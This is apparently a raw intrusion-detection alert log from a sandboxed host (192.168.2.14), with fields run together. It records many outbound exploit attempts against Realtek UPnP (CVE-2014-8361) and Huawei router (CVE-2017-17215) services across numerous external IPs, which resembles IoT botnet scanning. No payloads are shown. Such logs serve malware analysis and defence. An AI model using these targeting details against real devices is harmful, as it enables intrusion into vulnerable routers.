                                                07/20/24-23:06:01.949518TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3956452869192.168.2.14118.95.252.63
                                                07/20/24-23:07:06.736138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3737837215192.168.2.14133.187.150.141
                                                07/20/24-23:05:38.956391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4184637215192.168.2.1441.123.89.190
                                                07/20/24-23:06:17.661736TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615582252869192.168.2.1440.173.149.130
                                                07/20/24-23:05:34.657263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5312037215192.168.2.1441.14.60.190
                                                07/20/24-23:05:50.528919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6037837215192.168.2.1420.37.51.202
                                                07/20/24-23:05:40.465472TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5516452869192.168.2.14118.253.173.37
                                                07/20/24-23:05:40.439699TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5533052869192.168.2.14152.153.83.132
                                                07/20/24-23:05:57.457796TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4575052869192.168.2.148.51.102.139
                                                07/20/24-23:05:50.555898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3565437215192.168.2.14157.92.108.181
                                                07/20/24-23:05:36.339999TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4289037215192.168.2.14157.92.9.122
                                                07/20/24-23:05:36.343227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4981637215192.168.2.1441.177.215.233
                                                07/20/24-23:06:29.727366TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615037052869192.168.2.1487.9.39.34
                                                07/20/24-23:05:57.137886TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5884252869192.168.2.14178.246.89.184
                                                07/20/24-23:06:01.893151TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3279852869192.168.2.14118.206.217.195
                                                07/20/24-23:06:02.577230TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4195652869192.168.2.1419.179.160.126
                                                07/20/24-23:05:57.139895TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3310452869192.168.2.14115.67.18.16
                                                07/20/24-23:05:58.662427TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613998052869192.168.2.14210.197.231.89
                                                07/20/24-23:05:57.934535TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4992452869192.168.2.14118.21.82.230
                                                07/20/24-23:06:14.442724TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614808052869192.168.2.14207.87.0.239
                                                07/20/24-23:06:21.746493TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3774852869192.168.2.14221.179.69.203
                                                07/20/24-23:06:23.413340TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613593252869192.168.2.14157.225.189.81
                                                07/20/24-23:05:56.038244TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4902037215192.168.2.14157.140.82.218
                                                07/20/24-23:05:37.442743TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3533252869192.168.2.14189.230.165.186
                                                07/20/24-23:05:39.647017TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613837852869192.168.2.1495.146.229.83
                                                07/20/24-23:06:44.665919TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25913452869192.168.2.1495.117.101.32
                                                07/20/24-23:05:38.939890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5904837215192.168.2.14158.191.230.234
                                                07/20/24-23:06:01.433779TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25401852869192.168.2.1478.100.44.178
                                                07/20/24-23:06:08.195958TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4946252869192.168.2.1443.139.32.29
                                                07/20/24-23:05:35.835422TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4331452869192.168.2.14196.32.183.241
                                                07/20/24-23:05:59.714236TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4343252869192.168.2.1481.47.157.203
                                                07/20/24-23:05:38.743174TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613490452869192.168.2.14200.28.88.206
                                                07/20/24-23:05:39.777436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4648637215192.168.2.14147.153.145.70
                                                07/20/24-23:06:05.879269TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25049452869192.168.2.1490.96.121.212
                                                07/20/24-23:05:57.816478TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5433052869192.168.2.14108.132.143.152
                                                07/20/24-23:05:40.365777TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24597052869192.168.2.14180.90.7.162
                                                07/20/24-23:06:36.110698TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25347052869192.168.2.14160.237.156.120
                                                07/20/24-23:05:59.133147TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4090052869192.168.2.1473.142.223.114
                                                07/20/24-23:05:40.365973TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23592852869192.168.2.14174.146.134.66
                                                07/20/24-23:05:36.433724TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615650052869192.168.2.14218.210.113.18
                                                07/20/24-23:05:39.067591TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5155437215192.168.2.1441.84.68.83
                                                07/20/24-23:06:16.332122TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25165852869192.168.2.14105.206.141.172
                                                07/20/24-23:05:52.515826TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5262852869192.168.2.14198.39.44.17
                                                07/20/24-23:06:39.471724TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614054052869192.168.2.14121.13.235.76
                                                07/20/24-23:05:33.853184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5524237215192.168.2.1441.189.66.95
                                                07/20/24-23:05:58.403603TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614527452869192.168.2.14150.217.211.82
                                                07/20/24-23:05:35.952301TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5517852869192.168.2.14141.117.5.138
                                                07/20/24-23:05:48.841499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5309637215192.168.2.14116.90.202.150
                                                07/20/24-23:05:57.887085TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23289052869192.168.2.14190.92.119.202
                                                07/20/24-23:06:03.784686TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4381452869192.168.2.1485.78.98.108
                                                07/20/24-23:06:15.818526TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5295052869192.168.2.1453.151.155.201
                                                07/20/24-23:06:30.636367TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23567252869192.168.2.1460.28.102.104
                                                07/20/24-23:05:35.771029TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614311052869192.168.2.14124.61.165.111
                                                07/20/24-23:06:06.184196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4386652869192.168.2.14203.100.96.66
                                                07/20/24-23:05:48.808887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3640037215192.168.2.1441.250.1.75
                                                07/20/24-23:05:56.997704TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3708252869192.168.2.1417.219.48.33
                                                07/20/24-23:05:48.821008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5752037215192.168.2.14157.18.156.214
                                                07/20/24-23:06:19.575886TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5417252869192.168.2.14190.50.4.69
                                                07/20/24-23:05:52.503773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4531452869192.168.2.1493.192.213.30
                                                07/20/24-23:06:06.546922TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615514852869192.168.2.144.35.177.241
                                                07/20/24-23:05:48.777005TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3497837215192.168.2.1441.243.199.56
                                                07/20/24-23:06:00.191114TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3909852869192.168.2.14139.145.62.207
                                                07/20/24-23:06:09.682183TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5884852869192.168.2.144.189.206.195
                                                07/20/24-23:05:57.141104TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26057252869192.168.2.14130.169.76.188
                                                07/20/24-23:05:59.417612TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5674252869192.168.2.14130.122.247.240
                                                07/20/24-23:05:37.472951TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24269052869192.168.2.14205.9.202.98
                                                07/20/24-23:05:56.121210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5742237215192.168.2.14172.99.105.225
                                                07/20/24-23:06:03.378832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3377237215192.168.2.1441.249.79.68
                                                07/20/24-23:06:41.431490TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3434852869192.168.2.14180.193.127.65
                                                07/20/24-23:06:11.045159TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614923452869192.168.2.1473.73.160.90
                                                07/20/24-23:06:04.936056TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5348052869192.168.2.14181.7.176.20
                                                07/20/24-23:06:14.460726TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615600852869192.168.2.14211.197.197.167
                                                07/20/24-23:06:12.531607TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3915452869192.168.2.14170.202.83.13
                                                07/20/24-23:05:35.729283TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5259652869192.168.2.14179.192.77.243
                                                07/20/24-23:05:57.820676TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3962852869192.168.2.1467.42.219.248
                                                07/20/24-23:05:34.656192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3480037215192.168.2.14197.232.70.152
                                                07/20/24-23:06:07.283476TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25519652869192.168.2.1484.52.21.90
                                                07/20/24-23:05:38.953643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3732037215192.168.2.14109.109.253.255
                                                07/20/24-23:06:07.090928TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4272652869192.168.2.14163.243.69.131
                                                07/20/24-23:06:23.185144TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25317452869192.168.2.145.36.215.241
                                                07/20/24-23:05:37.540434TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25627052869192.168.2.14195.182.30.127
                                                07/20/24-23:05:58.373329TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615034252869192.168.2.14221.147.86.128
                                                07/20/24-23:06:15.174161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5901652869192.168.2.14164.66.171.183
                                                07/20/24-23:05:33.860838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3458637215192.168.2.14155.178.232.143
                                                07/20/24-23:05:39.054227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3694237215192.168.2.14197.30.233.251
                                                07/20/24-23:05:40.359038TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24890452869192.168.2.1417.225.60.69
                                                07/20/24-23:06:17.501695TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614832652869192.168.2.14161.51.22.215
                                                07/20/24-23:07:06.347525TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4110252869192.168.2.1450.238.40.216
                                                07/20/24-23:07:03.123323TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615225852869192.168.2.14113.222.174.92
                                                07/20/24-23:06:06.077998TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4761252869192.168.2.14145.133.233.116
                                                07/20/24-23:06:07.419849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4701437215192.168.2.14197.226.210.20
                                                07/20/24-23:05:39.055909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654037215192.168.2.14197.39.59.59
                                                07/20/24-23:05:42.180899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4946837215192.168.2.1441.59.91.11
                                                07/20/24-23:05:57.194696TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4095852869192.168.2.1462.67.165.78
                                                07/20/24-23:06:25.602644TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4356052869192.168.2.1461.74.182.247
                                                07/20/24-23:05:52.565127TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24441452869192.168.2.14139.27.203.218
                                                07/20/24-23:06:07.499893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4136037215192.168.2.1441.245.124.45
                                                07/20/24-23:05:40.478948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5046652869192.168.2.149.176.88.108
                                                07/20/24-23:06:02.508900TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25884252869192.168.2.14192.220.114.246
                                                07/20/24-23:06:07.761612TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24251852869192.168.2.1417.191.215.191
                                                07/20/24-23:06:08.306292TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615343052869192.168.2.14147.108.61.100
                                                07/20/24-23:05:33.833027TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4116637215192.168.2.14197.163.62.174
                                                07/20/24-23:05:57.156324TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615558052869192.168.2.14145.10.65.112
                                                07/20/24-23:05:45.297601TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614703452869192.168.2.14161.118.217.155
                                                07/20/24-23:06:54.833146TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4720452869192.168.2.1443.191.221.139
                                                07/20/24-23:05:52.450049TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4085252869192.168.2.14218.180.53.12
                                                07/20/24-23:05:40.359038TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24933052869192.168.2.1468.179.40.208
                                                07/20/24-23:05:50.600216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414837215192.168.2.1498.57.71.164
                                                07/20/24-23:05:46.257528TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613863652869192.168.2.14107.0.137.66
                                                07/20/24-23:06:54.435154TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23431052869192.168.2.14209.62.86.250
                                                07/20/24-23:07:04.456849TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614951252869192.168.2.1414.168.71.154
                                                07/20/24-23:06:34.260416TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6072252869192.168.2.14139.133.137.186
                                                07/20/24-23:05:48.783693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3507237215192.168.2.14197.16.244.151
                                                07/20/24-23:05:57.618622TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3372852869192.168.2.14149.232.29.216
                                                07/20/24-23:06:01.842190TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3821252869192.168.2.14219.82.29.79
                                                07/20/24-23:05:52.493809TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4553052869192.168.2.1473.191.176.248
                                                07/20/24-23:05:57.958012TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5633652869192.168.2.14128.239.71.215
                                                07/20/24-23:05:56.250145TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5191652869192.168.2.1467.18.202.14
                                                07/20/24-23:05:57.781031TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4925852869192.168.2.14198.211.177.39
                                                07/20/24-23:05:59.333647TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4818652869192.168.2.14123.51.179.219
                                                07/20/24-23:05:57.532549TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3875452869192.168.2.149.153.76.157
                                                07/20/24-23:05:57.013302TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25617052869192.168.2.14163.139.96.29
                                                07/20/24-23:05:52.544570TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23585252869192.168.2.14211.43.222.47
                                                07/20/24-23:05:59.119354TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5255652869192.168.2.14181.7.176.20
                                                07/20/24-23:06:07.259152TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614043052869192.168.2.14122.149.24.168
                                                07/20/24-23:06:31.352260TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614272652869192.168.2.14106.188.225.74
                                                07/20/24-23:05:36.343227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5877437215192.168.2.14149.234.88.62
                                                07/20/24-23:06:03.296826TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25469652869192.168.2.14158.91.168.95
                                                07/20/24-23:06:08.489738TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6088652869192.168.2.144.87.173.24
                                                07/20/24-23:05:36.032524TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3838652869192.168.2.14134.42.80.231
                                                07/20/24-23:05:42.256029TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5314237215192.168.2.1493.47.151.173
                                                07/20/24-23:06:06.576731TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615737452869192.168.2.14104.101.179.225
                                                07/20/24-23:05:53.235379TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4691452869192.168.2.14191.106.159.193
                                                07/20/24-23:05:57.173548TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615437252869192.168.2.1419.148.221.102
                                                07/20/24-23:05:50.537576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4345037215192.168.2.14197.26.161.246
                                                07/20/24-23:05:40.365777TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4043052869192.168.2.1491.115.151.211
                                                07/20/24-23:06:53.637724TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5457252869192.168.2.1454.49.52.11
                                                07/20/24-23:05:50.571555TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3409637215192.168.2.14206.14.58.9
                                                07/20/24-23:05:34.662485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4896037215192.168.2.14157.182.60.47
                                                07/20/24-23:05:37.445004TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5072652869192.168.2.1440.31.56.204
                                                07/20/24-23:05:40.406154TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3440452869192.168.2.1434.187.124.168
                                                07/20/24-23:05:52.671380TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25954452869192.168.2.14154.45.85.205
                                                07/20/24-23:05:38.619944TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613889252869192.168.2.14144.76.154.113
                                                07/20/24-23:05:52.545166TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3525052869192.168.2.14101.8.57.23
                                                07/20/24-23:05:47.107735TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4831637215192.168.2.14157.238.207.80
                                                07/20/24-23:05:34.657123TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618037215192.168.2.14157.131.171.170
                                                07/20/24-23:06:01.363153TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613474852869192.168.2.14146.125.220.156
                                                07/20/24-23:06:17.383428TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25792452869192.168.2.1476.60.118.192
                                                07/20/24-23:05:52.502632TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25114652869192.168.2.1461.16.44.183
                                                07/20/24-23:05:39.587933TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4787452869192.168.2.1468.179.40.208
                                                07/20/24-23:05:37.556915TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24151452869192.168.2.14100.147.99.239
                                                07/20/24-23:05:57.540063TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614581052869192.168.2.14205.22.105.116
                                                07/20/24-23:05:45.403074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5697237215192.168.2.14157.125.35.160
                                                07/20/24-23:05:50.600216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5588837215192.168.2.14197.169.228.207
                                                07/20/24-23:05:37.458829TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23598452869192.168.2.1448.191.112.200
                                                07/20/24-23:05:35.510955TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4414452869192.168.2.14132.232.1.40
                                                07/20/24-23:05:38.953817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4976037215192.168.2.1441.60.65.216
                                                07/20/24-23:06:27.950361TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3859252869192.168.2.14126.106.173.181
                                                07/20/24-23:05:36.325773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4881637215192.168.2.1441.127.89.65
                                                07/20/24-23:05:59.249229TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4111452869192.168.2.14128.103.206.27
                                                07/20/24-23:05:57.791970TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613299652869192.168.2.14189.213.60.124
                                                07/20/24-23:06:06.813303TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24787652869192.168.2.1466.1.85.90
                                                07/20/24-23:06:14.916755TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4150252869192.168.2.1437.161.35.44
                                                07/20/24-23:06:25.893173TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614493052869192.168.2.1494.16.231.9
                                                07/20/24-23:06:18.935568TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3915652869192.168.2.1490.186.107.209
                                                07/20/24-23:05:37.453720TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4136452869192.168.2.1470.251.155.61
                                                07/20/24-23:06:35.340397TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25024452869192.168.2.14182.124.0.183
                                                07/20/24-23:05:57.161619TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4842252869192.168.2.14211.68.211.55
                                                07/20/24-23:05:48.858199TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5188237215192.168.2.14197.97.65.149
                                                07/20/24-23:06:25.857962TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4435652869192.168.2.14158.189.117.28
                                                07/20/24-23:05:35.294828TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613427652869192.168.2.14117.129.252.99
                                                07/20/24-23:05:57.625091TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613784652869192.168.2.1447.203.133.138
                                                07/20/24-23:05:48.216159TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614855652869192.168.2.14164.86.63.183
                                                07/20/24-23:05:56.127169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3830637215192.168.2.14197.69.89.50
                                                07/20/24-23:05:57.830942TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615688652869192.168.2.148.163.140.146
                                                07/20/24-23:05:40.421092TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5169052869192.168.2.1492.177.97.112
                                                07/20/24-23:05:59.445692TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24751652869192.168.2.14168.45.23.98
